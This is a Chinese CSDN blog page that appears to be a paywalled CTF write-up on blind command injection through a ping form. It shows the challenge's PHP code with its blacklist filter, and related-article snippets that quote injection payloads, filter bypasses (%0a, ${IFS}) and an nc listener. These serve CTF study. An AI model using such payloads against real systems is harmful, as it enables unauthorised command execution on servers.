CTF中ping文件执行漏洞无回显反弹拿flag

最新推荐文章于 2024-10-17 09:56:38 发布
最新推荐文章于 2024-10-17 09:56:38 发布
阅读量9.7k 收藏 9
点赞数 3
分类专栏: 文件执行 文章标签: ping文件执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42877694/article/details/88928197
版权
本文详细介绍了在CTF比赛中遇到的ping文件执行漏洞,探讨了如何绕过过滤限制,利用Linux管道符实现无回显的命令执行。通过反弹shell和base64编码技巧,最终成功获取flag。过程中提到了sh -c、eval()、base64编码解码以及shell_exec()等关键概念。
摘要由CSDN通过智能技术生成

打开网页内容如下
在这里插入图片描述
我们来看一下核心代码

<?php
           include_once "code.txt";
           if (isset($_POST['ip'])) {
               $p=$_POST['ip'];
               if(preg_match("/(;|`|&| |\\$|python|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $p)){
                   die("Hacker!");
               }
               $cmd = 'ping -c1 '.$_POST['ip'];
               $result = runLocalCommand($cmd);
               if ($result) {
                   echo "Success!";
               } else {
                   echo "Error!";
               }
           }
           ?>

preg_match()是PHP里用于正则表达式匹配的

正则表达式包含在/ /中间

preg_match("/(;|`|&| |\\$|python|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $p)

这句代码就在$p变量里查找是否有如下

最低0.47元/天 解锁文章
拉风的鲨鱼
关注
专栏目录
CTF入门web篇18命令执行回显的判断方法及dnslog相关例题
anquanniu的博客
10-19 4673
命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
ctf php 读取flag,ctf题:pinstore获取flag
weixin_42304618的博客
03-11 1964
首先先用jadx反编译出源代码,可以看到目录结构 从这里就可以知道我们只需查看pinlock.ctf.pinlock.com.pinstore目录下的代码即可先从MainActivity看起 从源代码我们可以知道pinFormDB是数据库存储的密码、hashOfEnteredPin属于我们输入的密码加密后的密文,在这里我们可以修改if的判断条件接下来通过apktool工具对apk文件进行反编译得...
[CTF]命令执行回显利用
cosmoslin的博客
02-21 9091
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
CTF(四)
最新发布
2302_80280669的博客
10-17 948
本文主要讲述在CTF竞赛,web类SQL注入题目file_include。
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 2071
ctf获取flag入门
CTF入门笔记之ping
qq_37410729的博客
11-02 4453
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
CTF——ping相关
jklw4的博客
09-12 4593
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping 题目
CTF演练---ping
2301_78637299的博客
06-06 757
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 4933
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测,探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
浅谈PHP无回显命令执行的利用
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 629
前言 在CTF题或在一些渗透测试往往会遇到没有回显的命令执行漏洞,为了能更好的实现对无回显命令执行漏洞的利用,我对此进行了简单总结。 判断方法 命令执行可能会存在命令执行但没有回显,所以首先要判断命令是否有执行。确定命令可以执行,然后就可以进行无回显命令执行的利用了。 1、审计代码 审计代码,根据代码逻辑判断(这个就需要扎实的审计代码能力的功底了) 2、利用延时 ip=|sleep 5 如果执行后延时5秒,就证明测试点存在命令执行漏洞 3、HTTP请求 注意:ping命令不会产生
云演CTF web题型 ping
cadandme的博客
01-19 2094
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______了,直接查看,得到flag ...
CTF下的命令执行
Lemon's blog
04-28 9842
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
ctf-ping命令执行
qq_45414878的博客
11-08 1万+
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
[pingCTF 2023] 闲来无事作个题
weixin_52640415的博客
12-30 1129
谁元旦还打CTF啊,这两周没有比赛,明天才加班,作个已经过去的比赛。好在已经有官方WP,不会的可以看。
CTF 解题 云演 ping
weixin_53488451的博客
01-08 524
输入http://88f9c597.clsadp.com/?ip=127.0.0.1%0acat%20fL4g_1s_He4r_______4.查看其文件得出flag。3.尝试查看,发现文件名。2.检查主机是否在线。
ctf】命令执行漏洞(二)
wlllllianqing的博客
10-15 370
命令执行漏洞(二) 命令执行回显的判定方法 1.延时 2.http请求 3.dns请求 可使用ping请求,但是nc无法监听ping请求。 linux下的ping不会停止,windows下面的ping会停止 ping -c 3 xxx.xxx.xxx -c 3:ping3次 利用 1.写shell 2.http/dns等方式带出数据 '>'符号:将前面的命令生成的内容写到一个文件 因为ping ip 是不能出现空格的,所以我们可以构造来消除空格 ...
一招迅速搞定无回显函数shell_exec
csjjjd的博客
12-14 1202
今天带大家学习一下在CTF命令执行时遇到无回显怎么办?这里拿一道题目举例:这道题是不是很简单,直接???hp不就可以了吗?
ctf 监听端口_浅谈ctf的无回显
06-10
CTF的无回显指的是无法直接从应用程序输出或网络流量获取结果的情况。在某些情况下,CTF比赛的参赛者需要在没有回显的情况下解决一些问题,例如监听某个端口。 在CTF,监听端口通常意味着需要在某个特定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值